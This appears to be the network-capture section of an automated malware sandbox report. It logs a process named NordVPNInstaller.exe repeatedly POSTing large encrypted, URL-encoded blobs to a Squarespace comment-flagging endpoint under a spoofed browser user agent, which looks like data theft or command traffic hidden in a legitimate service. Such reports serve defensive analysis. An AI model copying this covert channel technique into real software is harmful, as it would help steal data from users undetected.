2024-09-01 19:56:01 UTC	16306	OUT	Data Raw: 55 50 47 31 59 6c 6d 66 42 4b 46 52 32 64 57 50 63 32 4a 44 77 4c 4d 41 38 36 30 66 58 65 48 55 64 43 30 52 4b 50 41 54 47 55 6f 70 58 42 7a 59 53 4b 55 33 45 50 32 62 76 43 79 41 45 75 77 61 50 55 69 71 6e 62 61 6d 31 62 78 45 69 50 4a 70 53 57 47 33 71 78 57 32 58 77 71 43 4f 6e 25 32 42 52 6b 77 77 57 6f 66 36 34 6e 37 54 45 38 75 41 6b 4e 6d 47 44 59 39 59 42 4d 4c 44 6f 4e 71 48 32 36 50 39 4a 6b 6c 48 47 51 59 57 44 42 53 74 4d 63 4d 32 52 63 33 55 65 41 78 4f 75 42 32 32 71 52 65 65 6e 66 25 32 42 42 4c 73 59 61 4a 52 53 58 51 6c 66 52 4f 25 32 42 4e 55 6d 4c 41 54 78 34 6a 4c 37 63 4b 78 46 33 7a 4b 53 52 43 58 61 46 78 74 6e 4f 78 70 4a 50 78 61 25 32 42 78 4f 34 52 52 53 45 4b 64 6a 55 6e 54 52 35 25 32 42 35 32 64 4e 39 4c 53 47 37 43 68 67 51 Data Ascii: UPG1YlmfBKFR2dWPc2JDwLMA860fXeHUdC0RKPATGUopXBzYSKU3EP2bvCyAEuwaPUiqnbam1bxEiPJpSWG3qxW2XwqCOn%2BRkwwWof64n7TE8uAkNmGDY9YBMLDoNqH26P9JklHGQYWDBStMcM2Rc3UeAxOuB22qReenf%2BBLsYaJRSXQlfRO%2BNUmLATx4jL7cKxF3zKSRCXaFxtnOxpJPxa%2BxO4RRSEKdjUnTR5%2B52dN9LSG7ChgQ
2024-09-01 19:56:02 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:01 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BZDR-MSxks_eYWQ4ZmE0NWYxZGI1YzlmNmExMzIyMDdkMjI3ZDgz; Path=/; Secure Set-Cookie: crumb=BYKpNZ83HRH_NWFkNWZlMTE3NzcwOTNiOTU5N2IxOWY0Y2VhZTQz; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: bixtdzwt/i4ixr5Wu Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BYKpNZ83HRH_NWFkNWZlMTE3NzcwOTNiOTU5N2IxOWY0Y2VhZTQz"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49754	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:11 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:11 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:11 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:11 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:11 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:11 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BQXV6ci38QCiY2M1MDczNzJkY2RmYTE2YmRlMmJjZmExNmYzOTE3; Path=/; Secure Set-Cookie: crumb=BTY5eLxkATtrZDRiZjhjOWZhNTkyNmUyMWFlOWM2YjUzN2QwODk0; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: abC7ft2r/AHQZbwiJ Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BTY5eLxkATtrZDRiZjhjOWZhNTkyNmUyMWFlOWM2YjUzN2QwODk0"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49755	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:11 UTC	296	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108352 Expect: 100-continue
2024-09-01 19:56:11 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:11 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:11 UTC	16306	OUT	Data Raw: 3d 6e 55 61 46 59 5a 59 4f 2f 51 62 42 4d 70 25 32 42 71 73 50 4d 44 4f 43 31 72 56 48 6d 43 74 36 70 6c 57 73 65 37 33 72 65 51 25 32 42 6a 6a 39 46 48 79 75 62 25 32 42 76 58 39 66 4c 33 64 65 79 56 63 52 72 6f 57 4a 30 32 6c 56 6d 62 4d 51 51 72 30 35 55 7a 79 78 70 53 41 62 72 6a 4a 43 30 5a 77 6f 73 75 4f 66 54 50 62 46 46 39 32 59 79 78 74 54 4d 54 25 32 42 64 69 75 77 48 62 62 58 32 52 25 32 42 74 34 69 59 6d 49 6d 75 48 38 67 79 74 34 4f 57 34 49 61 4d 4b 48 76 54 4c 33 30 71 61 53 54 64 37 6c 57 57 6f 71 30 75 37 2f 4a 4e 67 4c 44 47 38 70 25 32 42 65 53 35 55 71 4a 71 37 44 61 54 59 42 73 30 59 4b 52 43 4b 62 78 4d 77 6c 68 75 68 6d 33 56 6e 74 34 79 47 50 74 6a 6c 34 4a 59 44 6f 71 56 37 42 64 51 70 67 45 39 6e 64 77 52 57 25 32 42 44 55 51 77 Data Ascii: =nUaFYZYO/QbBMp%2BqsPMDOC1rVHmCt6plWse73reQ%2Bjj9FHyub%2BvX9fL3deyVcRroWJ02lVmbMQQr05UzyxpSAbrjJC0ZwosuOfTPbFF92YyxtTMT%2BdiuwHbbX2R%2Bt4iYmImuH8gyt4OW4IaMKHvTL30qaSTd7lWWoq0u7/JNgLDG8p%2BeS5UqJq7DaTYBs0YKRCKbxMwlhuhm3Vnt4yGPtjl4JYDoqV7BdQpgE9ndwRW%2BDUQw
2024-09-01 19:56:11 UTC	1	OUT	Data Raw: 76 Data Ascii: v
2024-09-01 19:56:11 UTC	16306	OUT	Data Raw: 49 48 4a 38 75 54 45 6a 69 35 6e 68 57 45 58 4f 54 4e 74 68 66 67 55 6a 66 42 7a 57 4a 25 32 42 4a 2f 41 32 32 4a 5a 6a 45 53 69 6d 46 65 56 46 4b 54 6b 47 30 34 53 63 67 71 75 31 38 52 77 34 48 56 6a 52 61 52 46 48 70 43 75 4a 33 69 33 45 7a 51 36 42 41 46 50 64 69 62 6c 74 4a 58 4d 64 58 43 62 52 65 63 75 4f 78 6e 6e 67 68 71 70 58 67 47 46 51 49 4c 72 52 78 6c 6b 41 69 43 33 57 7a 36 45 4f 4a 45 35 79 34 71 33 77 4c 53 51 69 35 31 78 75 53 51 59 66 68 41 6e 48 5a 4a 52 45 47 54 41 69 55 47 6b 35 47 78 70 50 41 55 4a 7a 7a 39 71 47 32 66 4c 6b 50 65 62 59 4b 43 47 41 64 42 43 56 25 32 42 2f 35 5a 66 54 67 5a 77 34 30 51 36 4a 2f 4e 56 68 4f 6d 4a 46 42 70 4f 52 73 61 54 77 46 43 6e 6f 78 57 68 61 34 49 4a 4e 6f 2f 64 53 38 54 77 63 36 35 46 6a 54 63 6f Data Ascii: IHJ8uTEji5nhWEXOTNthfgUjfBzWJ%2BJ/A22JZjESimFeVFKTkG04Scgqu18Rw4HVjRaRFHpCuJ3i3EzQ6BAFPdibltJXMdXCbRecuOxnnghqpXgGFQILrRxlkAiC3Wz6EOJE5y4q3wLSQi51xuSQYfhAnHZJREGTAiUGk5GxpPAUJzz9qG2fLkPebYKCGAdBCV%2B/5ZfTgZw40Q6J/NVhOmJFBpORsaTwFCnoxWha4IJNo/dS8Twc65FjTco
2024-09-01 19:56:11 UTC	1	OUT	Data Raw: 61 Data Ascii: a
2024-09-01 19:56:11 UTC	16306	OUT	Data Raw: 35 6c 61 62 61 61 53 50 32 53 67 4e 2f 33 34 5a 33 39 56 42 5a 52 4c 4d 37 4f 6d 32 25 32 42 71 79 73 36 63 67 44 51 72 74 55 38 67 78 32 7a 53 51 4d 77 72 4c 30 37 71 35 62 57 54 4c 43 2f 61 7a 50 4a 5a 4c 76 6b 6a 49 58 74 66 32 71 44 43 79 32 55 59 4c 44 72 4e 77 6e 6f 52 32 37 68 43 72 74 35 61 31 6f 34 71 4e 31 6d 55 35 71 51 74 6b 52 31 41 43 56 46 59 64 6b 76 50 35 5a 38 63 65 50 44 35 46 53 35 51 39 25 32 42 44 6e 65 73 6d 45 4d 78 39 74 4d 42 41 63 67 53 47 53 45 25 32 42 6c 2f 74 67 4c 67 69 53 25 32 42 32 56 67 53 51 4d 5a 38 70 63 71 42 44 66 6b 53 4b 50 61 6e 72 39 4c 48 46 33 41 48 35 31 62 7a 77 73 48 67 78 4a 63 47 62 6f 34 4e 6d 35 78 59 4e 76 49 42 38 4a 43 59 45 48 70 55 77 7a 63 73 74 65 76 4a 2f 37 4d 79 2f 49 67 70 63 67 5a 39 63 6c Data Ascii: 5labaaSP2SgN/34Z39VBZRLM7Om2%2Bqys6cgDQrtU8gx2zSQMwrL07q5bWTLC/azPJZLvkjIXtf2qDCy2UYLDrNwnoR27hCrt5a1o4qN1mU5qQtkR1ACVFYdkvP5Z8cePD5FS5Q9%2BDnesmEMx9tMBAcgSGSE%2Bl/tgLgiS%2B2VgSQMZ8pcqBDfkSKPanr9LHF3AH51bzwsHgxJcGbo4Nm5xYNvIB8JCYEHpUwzcstevJ/7My/IgpcgZ9cl
2024-09-01 19:56:11 UTC	1	OUT	Data Raw: 53 Data Ascii: S
2024-09-01 19:56:11 UTC	16306	OUT	Data Raw: 44 39 50 41 79 56 6e 73 58 67 45 47 6e 38 74 59 6a 32 68 4b 59 68 77 69 46 39 34 6c 38 69 2f 6d 6e 68 44 39 37 37 74 42 63 74 51 52 6e 45 44 52 43 56 75 77 6c 38 73 6f 7a 4c 54 4a 6a 4a 61 37 37 50 47 6c 4f 79 5a 70 4c 2f 6e 35 4a 63 6b 6f 44 25 32 42 71 51 45 61 45 7a 49 43 77 31 4e 37 7a 4c 34 6b 4c 34 70 64 6d 63 66 45 69 51 6e 61 57 32 4c 4e 67 55 73 78 31 67 2f 79 4c 66 2f 5a 47 39 39 37 6a 5a 57 50 36 44 69 54 56 50 44 44 31 38 4d 79 46 34 42 6d 58 67 35 65 37 41 6e 4f 4e 58 6f 25 32 42 54 77 49 58 4a 43 6a 6b 50 73 63 53 25 32 42 50 49 59 67 4f 37 44 34 5a 55 30 39 47 44 52 4f 76 47 53 53 76 4f 65 79 49 55 34 36 70 57 72 67 66 76 37 6c 57 72 4c 66 32 57 58 74 38 46 63 6a 5a 6d 6c 63 39 4e 61 6b 35 5a 41 70 4c 58 4c 4d 7a 74 39 6b 73 4a 44 4e 77 67 Data Ascii: D9PAyVnsXgEGn8tYj2hKYhwiF94l8i/mnhD977tBctQRnEDRCVuwl8sozLTJjJa77PGlOyZpL/n5JckoD%2BqQEaEzICw1N7zL4kL4pdmcfEiQnaW2LNgUsx1g/yLf/ZG997jZWP6DiTVPDD18MyF4BmXg5e7AnONXo%2BTwIXJCjkPscS%2BPIYgO7D4ZU09GDROvGSSvOeyIU46pWrgfv7lWrLf2WXt8FcjZmlc9Nak5ZApLXLMzt9ksJDNwg
2024-09-01 19:56:11 UTC	1	OUT	Data Raw: 72 Data Ascii: r
2024-09-01 19:56:11 UTC	16306	OUT	Data Raw: 35 64 55 50 47 31 59 6c 6d 66 42 4b 46 52 32 64 57 50 63 32 4a 44 77 4c 4d 41 38 36 30 66 58 65 48 55 64 43 30 52 4b 50 41 54 47 55 6f 70 58 42 7a 59 53 4b 55 33 45 50 32 62 76 43 79 41 45 75 77 61 50 55 69 71 6e 62 61 6d 31 62 78 45 69 50 4a 70 53 57 47 33 71 78 57 32 58 77 71 43 4f 6e 25 32 42 52 6b 77 77 57 6f 66 36 34 6e 37 54 45 38 75 41 6b 4e 6d 47 44 59 39 59 42 4d 4c 44 6f 4e 71 48 32 36 50 39 4a 6b 6c 48 47 51 59 57 44 42 53 74 4d 63 4d 32 52 63 33 55 65 41 78 4f 75 42 32 32 71 52 65 65 6e 66 25 32 42 42 4c 73 59 61 4a 52 53 58 51 6c 66 52 4f 25 32 42 4e 55 6d 4c 41 54 78 34 6a 4c 37 63 4b 78 46 33 7a 4b 53 52 43 58 61 46 78 74 6e 4f 78 70 4a 50 78 61 25 32 42 78 4f 34 52 52 53 45 4b 64 6a 55 6e 54 52 35 25 32 42 35 32 64 4e 39 4c 53 47 37 43 68 Data Ascii: 5dUPG1YlmfBKFR2dWPc2JDwLMA860fXeHUdC0RKPATGUopXBzYSKU3EP2bvCyAEuwaPUiqnbam1bxEiPJpSWG3qxW2XwqCOn%2BRkwwWof64n7TE8uAkNmGDY9YBMLDoNqH26P9JklHGQYWDBStMcM2Rc3UeAxOuB22qReenf%2BBLsYaJRSXQlfRO%2BNUmLATx4jL7cKxF3zKSRCXaFxtnOxpJPxa%2BxO4RRSEKdjUnTR5%2B52dN9LSG7Ch
2024-09-01 19:56:11 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:11 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BZv6gCwGDY3WZjQ0ZTRhNzk5OWNlYzU4YmI3ZDE0ZDZhNmU0YmY3; Path=/; Secure Set-Cookie: crumb=Bb4MWthV7LutNTRjNDBiODQ4ZGIxM2MwMGZjZTEzNWYyZDFiZTJm; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: T92Q9jg2/CJtbNx9F Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"Bb4MWthV7LutNTRjNDBiODQ4ZGIxM2MwMGZjZTEzNWYyZDFiZTJm"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49756	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:14 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:14 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:14 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:14 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:14 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:14 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BZVfxXi7m-BjYWM5ZTdlMDhhYTFiODcyNDhjNDhlODljYjIwMzUx; Path=/; Secure Set-Cookie: crumb=BRu7--8MJxSiMmNkYzZiY2UzYTZiNTIyYjc5OTkxMzk4M2ZmMmQ1; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: GIOpn2WW/H1BcP6Wp Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BRu7--8MJxSiMmNkYzZiY2UzYTZiNTIyYjc5OTkxMzk4M2ZmMmQ1"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49757	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:14 UTC	296	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 116734 Expect: 100-continue
2024-09-01 19:56:14 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:14 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:14 UTC	16306	OUT	Data Raw: 3d 6e 55 61 46 59 5a 59 4f 2f 51 62 42 4d 70 25 32 42 71 73 50 4d 44 4f 43 31 72 56 48 6d 43 74 36 70 6c 57 73 65 37 33 72 65 51 25 32 42 6a 6a 39 46 48 79 75 62 25 32 42 76 58 39 66 4c 33 64 65 79 56 63 52 72 6f 57 4a 30 32 6c 56 6d 62 4d 51 51 72 30 35 55 7a 79 78 70 53 41 62 72 6a 4a 43 30 5a 77 6f 73 75 4f 66 54 50 62 46 46 39 32 59 78 39 77 62 62 30 77 4a 57 38 4e 48 62 62 58 32 52 25 32 42 74 34 69 59 6d 49 6d 75 48 38 67 79 74 34 4f 57 34 49 61 4d 4b 48 76 54 4c 33 30 71 61 53 54 64 37 6c 57 57 6f 71 30 75 37 2f 4a 4e 67 4c 44 47 38 70 25 32 42 65 53 35 55 71 4a 71 37 44 61 54 59 42 73 30 59 4b 52 43 4b 62 78 4d 77 6c 68 75 68 6d 33 56 6e 74 34 79 47 50 74 6a 6c 34 4a 59 44 6f 71 56 37 42 64 51 70 67 45 39 6e 64 77 52 57 25 32 42 44 55 51 77 68 6c Data Ascii: =nUaFYZYO/QbBMp%2BqsPMDOC1rVHmCt6plWse73reQ%2Bjj9FHyub%2BvX9fL3deyVcRroWJ02lVmbMQQr05UzyxpSAbrjJC0ZwosuOfTPbFF92Yx9wbb0wJW8NHbbX2R%2Bt4iYmImuH8gyt4OW4IaMKHvTL30qaSTd7lWWoq0u7/JNgLDG8p%2BeS5UqJq7DaTYBs0YKRCKbxMwlhuhm3Vnt4yGPtjl4JYDoqV7BdQpgE9ndwRW%2BDUQwhl
2024-09-01 19:56:14 UTC	1	OUT	Data Raw: 61 Data Ascii: a
2024-09-01 19:56:14 UTC	16306	OUT	Data Raw: 4b 4b 68 62 49 4e 30 51 42 42 34 43 63 30 67 4a 50 69 46 6a 44 67 36 2f 45 62 66 36 37 37 4a 47 32 63 79 4c 38 25 32 42 43 4f 7a 31 49 66 75 35 62 61 50 35 76 65 6d 36 65 67 6e 67 75 45 70 38 30 47 64 51 36 32 4f 58 37 53 6d 35 38 73 5a 4e 4c 71 2f 68 57 52 30 7a 54 34 74 68 63 35 41 6b 67 54 51 5a 4a 4e 49 67 41 6c 25 32 42 5a 4f 6f 68 65 51 42 67 6a 30 69 68 71 6d 6c 39 49 55 49 35 72 7a 67 74 4b 59 69 70 6c 78 32 48 52 63 75 41 70 66 77 4c 4d 75 31 57 53 6f 4a 45 45 34 43 43 75 41 46 45 79 6e 5a 76 4b 32 48 74 36 58 62 6a 69 58 39 6a 77 58 78 77 57 75 4a 6e 79 47 25 32 42 4a 4a 45 57 59 49 71 79 67 6c 32 48 49 77 78 56 32 63 32 36 53 53 4f 6b 72 79 54 58 32 64 36 79 59 51 7a 48 32 30 77 48 76 77 68 41 42 35 33 53 6d 33 67 4c 52 33 42 25 32 42 77 75 49 Data Ascii: KKhbIN0QBB4Cc0gJPiFjDg6/Ebf677JG2cyL8%2BCOz1Ifu5baP5vem6egnguEp80GdQ62OX7Sm58sZNLq/hWR0zT4thc5AkgTQZJNIgAl%2BZOoheQBgj0ihqml9IUI5rzgtKYiplx2HRcuApfwLMu1WSoJEE4CCuAFEynZvK2Ht6XbjiX9jwXxwWuJnyG%2BJJEWYIqygl2HIwxV2c26SSOkryTX2d6yYQzH20wHvwhAB53Sm3gLR3B%2BwuI
2024-09-01 19:56:14 UTC	1	OUT	Data Raw: 73 Data Ascii: s
2024-09-01 19:56:14 UTC	16306	OUT	Data Raw: 6f 49 52 49 50 44 71 42 75 30 5a 57 58 39 65 72 42 39 45 4b 52 37 42 5a 30 72 72 46 6e 58 43 52 66 61 4f 4f 79 34 31 69 4a 37 38 4b 6a 77 72 75 4b 36 45 52 58 45 46 6b 4e 67 6d 34 30 54 4d 6f 77 34 79 34 56 79 71 68 6a 4a 35 4d 66 36 58 50 38 42 79 6e 30 74 35 72 56 4f 49 4d 46 67 65 59 56 41 4b 67 33 62 68 67 75 64 72 53 36 55 72 36 74 6f 31 47 44 76 39 71 49 4e 6b 2f 48 4a 75 6b 58 68 33 6d 41 67 69 50 68 61 46 46 47 34 61 39 48 42 5a 31 34 7a 63 77 67 61 48 4b 62 25 32 42 6e 70 58 57 49 30 34 38 6f 4b 51 45 43 61 66 48 62 42 52 39 57 34 31 6a 53 43 35 4c 69 79 6c 44 52 4d 64 74 70 65 4d 4a 6e 43 53 49 4d 43 75 64 42 38 4d 74 55 57 37 79 68 45 72 64 59 4a 53 4c 4f 70 6d 31 62 71 66 73 25 32 42 2f 54 5a 30 49 78 44 62 4a 76 43 36 37 56 52 6a 39 64 67 7a Data Ascii: oIRIPDqBu0ZWX9erB9EKR7BZ0rrFnXCRfaOOy41iJ78KjwruK6ERXEFkNgm40TMow4y4VyqhjJ5Mf6XP8Byn0t5rVOIMFgeYVAKg3bhgudrS6Ur6to1GDv9qINk/HJukXh3mAgiPhaFFG4a9HBZ14zcwgaHKb%2BnpXWI048oKQECafHbBR9W41jSC5LiylDRMdtpeMJnCSIMCudB8MtUW7yhErdYJSLOpm1bqfs%2B/TZ0IxDbJvC67VRj9dgz
2024-09-01 19:56:14 UTC	1	OUT	Data Raw: 36 Data Ascii: 6
2024-09-01 19:56:14 UTC	16306	OUT	Data Raw: 59 43 35 71 48 74 2f 6b 38 54 44 31 41 69 38 71 4b 6d 61 4a 43 55 63 6b 30 45 52 57 75 53 62 44 6a 58 45 48 56 68 4b 78 34 42 44 67 38 32 50 47 2f 78 56 32 69 4d 65 46 44 62 59 65 32 34 51 56 49 58 30 51 50 4f 52 39 77 54 4c 33 78 6f 69 41 73 63 50 4d 34 63 6d 37 7a 66 4f 35 5a 66 51 51 4a 77 4e 49 59 78 73 52 4c 45 6f 42 51 48 49 45 68 6b 68 50 70 66 36 64 36 79 59 51 7a 48 32 30 77 45 42 79 42 49 5a 49 54 36 58 25 32 42 6a 71 48 6e 73 6f 50 64 7a 37 43 55 4b 53 6a 30 64 76 70 57 55 39 36 48 45 25 32 42 39 39 48 42 34 44 44 63 49 78 74 39 6f 6f 70 68 25 32 42 46 32 4e 69 4f 5a 50 79 6f 61 37 46 35 55 63 67 4a 46 41 49 32 64 55 25 32 42 49 77 36 6d 4f 32 55 74 48 4c 58 73 54 25 32 42 4f 41 38 64 45 56 68 32 53 38 2f 6c 6e 78 78 58 48 46 66 4e 51 77 6d 53 Data Ascii: YC5qHt/k8TD1Ai8qKmaJCUck0ERWuSbDjXEHVhKx4BDg82PG/xV2iMeFDbYe24QVIX0QPOR9wTL3xoiAscPM4cm7zfO5ZfQQJwNIYxsRLEoBQHIEhkhPpf6d6yYQzH20wEByBIZIT6X%2BjqHnsoPdz7CUKSj0dvpWU96HE%2B99HB4DDcIxt9ooph%2BF2NiOZPyoa7F5UcgJFAI2dU%2BIw6mO2UtHLXsT%2BOA8dEVh2S8/lnxxXHFfNQwmS
2024-09-01 19:56:14 UTC	1	OUT	Data Raw: 76 Data Ascii: v
2024-09-01 19:56:14 UTC	16306	OUT	Data Raw: 6d 4a 44 6f 48 52 76 4e 72 64 68 68 25 32 42 79 61 6c 6f 4c 25 32 42 31 46 64 59 33 43 41 39 65 69 76 7a 71 74 73 45 48 73 6a 25 32 42 4b 35 54 2f 48 32 34 61 51 4f 41 7a 25 32 42 51 63 51 59 56 48 52 70 62 61 68 6b 2f 51 58 74 6b 33 65 4e 67 63 44 62 6e 46 72 32 6f 77 54 4c 66 6a 50 56 4d 39 44 6e 75 4e 64 66 67 55 6c 33 54 35 58 48 59 74 30 52 4f 36 56 46 79 78 6b 75 50 78 7a 69 33 77 62 33 7a 64 37 71 37 7a 66 2f 49 66 71 68 33 71 4b 4d 49 63 4f 49 5a 6c 51 65 63 43 55 47 72 64 57 4e 51 6c 71 37 56 76 45 25 32 42 67 6f 70 68 38 37 2f 5a 70 6e 4b 7a 46 59 44 4f 67 61 55 72 44 46 74 46 31 74 68 58 54 56 2f 59 4b 36 78 54 25 32 42 57 5a 42 4c 6e 55 4d 61 57 77 47 36 4e 67 39 2f 55 52 25 32 42 70 5a 77 63 39 72 37 25 32 42 69 58 57 50 41 75 31 4f 38 63 56 Data Ascii: mJDoHRvNrdhh%2ByaloL%2B1FdY3CA9eivzqtsEHsj%2BK5T/H24aQOAz%2BQcQYVHRpbahk/QXtk3eNgcDbnFr2owTLfjPVM9DnuNdfgUl3T5XHYt0RO6VFyxkuPxzi3wb3zd7q7zf/Ifqh3qKMIcOIZlQecCUGrdWNQlq7VvE%2Bgoph87/ZpnKzFYDOgaUrDFtF1thXTV/YK6xT%2BWZBLnUMaWwG6Ng9/UR%2BpZwc9r7%2BiXWPAu1O8cV
